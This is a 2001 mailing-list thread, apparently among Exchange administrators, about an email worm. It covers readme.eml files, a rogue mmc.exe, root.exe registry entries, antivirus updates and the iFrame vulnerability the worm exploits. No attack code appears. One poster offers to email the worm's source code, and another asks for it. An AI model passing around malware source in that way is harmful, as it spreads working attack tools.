 the sdat version 2 deleted a bunch of executables on the 
 three nt boxes we
 ran virus scan on.  we had it set to automatically clean.  
 iexplore.exe
 hyperterminal, etc.  not good.
 
 anyone else seeing this?
 
 
 -Original Message-
 From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 12:16 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 Yes, NAI released an extra.dat  Still waiting for trend to put out an
 update.  
 
 Pete Pfefferkorn
 Senior Systems Engineer/Mail Administrator
 University of Cincinnati
 51 Goodman Street
 Cincinnati, OH  45221
 Phone - (513) 556-9076
 Fax - (513) 556-2042
 
 
 -Original Message-
 From: Etts, Russell [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 2:51 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 Does anyone have any more info on this??
 
 Does NAI have an update?  I can't get through to them.
 
 Thanks
 
 Russell
 
 -Original Message-
 From: John Bricher [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 12:33 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 On the servers that were infected at our company, we found a 
 mmc.exe that
 was running in c:\winnt.  This appeared to be regenerating 
 the readme.eml
 files.  We killed the process, deleted the file, and deleted 
 the .eml files.
 This appears to have worked for now.
 
 Not sure how to stop it from happening again.
 
 
 John Bricher
 Windows NT Engineer
 Cybear, Inc.
 561-999-3549
 [EMAIL PROTECTED]
 
 
 



RE: New Virus / Worm ??

2001-09-18 Thread Gordon Olson

search the registry for root.exe, I didn't think I had it either but...

-Original Message-
From: Craig Manske [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:24 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Trend finally came out with their pattern update. :(  Luckily I didn't get it
anywhere.

 -Original Message-
 From: Heather Bellson [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 4:23 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 woops, i should say that i'm talking about NAI's sdat.
 
 -Original Message-
 From: Heather Bellson [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 2:16 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 the sdat version 2 deleted a bunch of executables on the 
 three nt boxes we
 ran virus scan on.  we had it set to automatically clean.  
 iexplore.exe
 hyperterminal, etc.  not good.
 
 anyone else seeing this?
 
 
 -Original Message-
 From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 12:16 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 Yes, NAI released an extra.dat  Still waiting for trend to put out an
 update.  
 
 Pete Pfefferkorn
 Senior Systems Engineer/Mail Administrator
 University of Cincinnati
 51 Goodman Street
 Cincinnati, OH  45221
 Phone - (513) 556-9076
 Fax - (513) 556-2042
 
 
 -Original Message-
 From: Etts, Russell [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 2:51 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 Does anyone have any more info on this??
 
 Does NAI have an update?  I can't get through to them.
 
 Thanks
 
 Russell
 
 -Original Message-
 From: John Bricher [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 12:33 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 On the servers that were infected at our company, we found a 
 mmc.exe that
 was running in c:\winnt.  This appeared to be regenerating 
 the readme.eml
 files.  We killed the process, deleted the file, and deleted 
 the .eml files.
 This appears to have worked for now.
 
 Not sure how to stop it from happening again.
 
 
 John Bricher
 Windows NT Engineer
 Cybear, Inc.
 561-999-3549
 [EMAIL PROTECTED]
 
 
 



RE: New Virus / Worm ??

2001-09-18 Thread Chuck Parkey

Symantec released the new virus defs (9/18/01) that are supposed to catch
this.

Chuck Parkey

-Original Message-
From: Craig Manske [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:24 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Trend finally came out with their pattern update. :(  Luckily I didn't get it
anywhere.

 -Original Message-
 From: Heather Bellson [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 4:23 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 woops, i should say that i'm talking about NAI's sdat.
 
 -Original Message-
 From: Heather Bellson [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 2:16 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 the sdat version 2 deleted a bunch of executables on the 
 three nt boxes we
 ran virus scan on.  we had it set to automatically clean.  
 iexplore.exe
 hyperterminal, etc.  not good.
 
 anyone else seeing this?
 
 
 -Original Message-
 From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 12:16 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 Yes, NAI released an extra.dat  Still waiting for trend to put out an
 update.  
 
 Pete Pfefferkorn
 Senior Systems Engineer/Mail Administrator
 University of Cincinnati
 51 Goodman Street
 Cincinnati, OH  45221
 Phone - (513) 556-9076
 Fax - (513) 556-2042
 
 
 -Original Message-
 From: Etts, Russell [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 2:51 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 Does anyone have any more info on this??
 
 Does NAI have an update?  I can't get through to them.
 
 Thanks
 
 Russell
 
 -Original Message-
 From: John Bricher [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 12:33 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 On the servers that were infected at our company, we found a 
 mmc.exe that
 was running in c:\winnt.  This appeared to be regenerating 
 the readme.eml
 files.  We killed the process, deleted the file, and deleted 
 the .eml files.
 This appears to have worked for now.
 
 Not sure how to stop it from happening again.
 
 
 John Bricher
 Windows NT Engineer
 Cybear, Inc.
 561-999-3549
 [EMAIL PROTECTED]




RE: New Virus / Worm ??

2001-09-18 Thread Gordon Olson

I searched the registry on the exchange box earlier and found the
readme.eml and root.exe under HK_users, Doc Find Spec MRU. I cannot find
the file anywhere on the machine and everything appears to be working fine. 

I did not have the ScanMail patch until about an hour or so ago. I am
blocking exe's now but I wasn't earlier today.

Should I just delete these values in the registry? 

TIA 

Gordon



-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 1:57 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


It exploits the very dangerous iFrame vulnerability detailed at
http://www.microsoft.com/technet/security/bulletin/ms01-020.asp. The one
thing that article doesn't tell you is that the IE patch it describes does
not block the ability of Office documents in an iFrame to launch
automatically. What that means is that if you don't have Office macro
security set high enough, the next attack could use a Word .doc macro to
deliver its payload.

 I just received an e-mail with this virus/worm.  It appears to be not very
 nice.  I use the preview pane in Outlook and it automatically attempted to
 launch the attachment.  For once, I'm glad I had the new security features
 in Outlook SR-1 that does not allow launching an .exe w/out saving it to the
 hard drive first.
 
 The virus had a subject with 255 characters in it.  Methinks there was/is an
 exploit for subject lines that long.




RE: New Virus / Worm ??

2001-09-18 Thread Lefkovics, William

Oh god, no

-Original Message-
From: Andrew Pike [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 1:16 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


May I have a copy please!!

-Original Message-
From: Daniel Deward [mailto:[EMAIL PROTECTED]]
Sent: 18 September 2001 21:08
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


If you want the source code for readme.exe, readme.asm.  Send me an e-mail
for a copy.  It's very interesting!

Dan
http://www.cmsconnect.com


-Original Message-
From: Erik Sojka [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 4:02 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??

What share does it create on an infected machine?





RE: New Virus / Worm ??

2001-09-18 Thread Greg Eytcheson

Exactly where in the registry did you find it?

-Original Message-
From: Gordon Olson [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 4:46 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??

search the registry for root.exe, I didn't think I had it either but...

-Original Message-
From: Craig Manske [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:24 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Trend finally came out with their pattern update. :(  Luckily I didn't get it
anywhere.

 -Original Message-
 From: Heather Bellson [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 4:23 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 woops, i should say that i'm talking about NAI's sdat.
 
 -Original Message-
 From: Heather Bellson [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 2:16 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 the sdat version 2 deleted a bunch of executables on the 
 three nt boxes we
 ran virus scan on.  we had it set to automatically clean.  
 iexplore.exe
 hyperterminal, etc.  not good.
 
 anyone else seeing this?
 
 
 -Original Message-
 From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 12:16 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 Yes, NAI released an extra.dat  Still waiting for trend to put out an
 update.  
 
 Pete Pfefferkorn
 Senior Systems Engineer/Mail Administrator
 University of Cincinnati
 51 Goodman Street
 Cincinnati, OH  45221
 Phone - (513) 556-9076
 Fax - (513) 556-2042
 
 
 -Original Message-
 From: Etts, Russell [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 2:51 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 Does anyone have any more info on this??
 
 Does NAI have an update?  I can't get through to them.
 
 Thanks
 
 Russell
 
 -Original Message-
 From: John Bricher [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 18, 2001 12:33 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 On the servers that were infected at our company, we found a 
 mmc.exe that
 was running in c:\winnt.  This appeared to be regenerating 
 the readme.eml
 files.  We killed the process, deleted the file, and deleted 
 the .eml files.
 This appears to have worked for now.
 
 Not sure how to stop it from happening again.
 
 
 John Bricher
 Windows NT Engineer
 Cybear, Inc.
 561-999-3549
 [EMAIL PROTECTED]
 
 

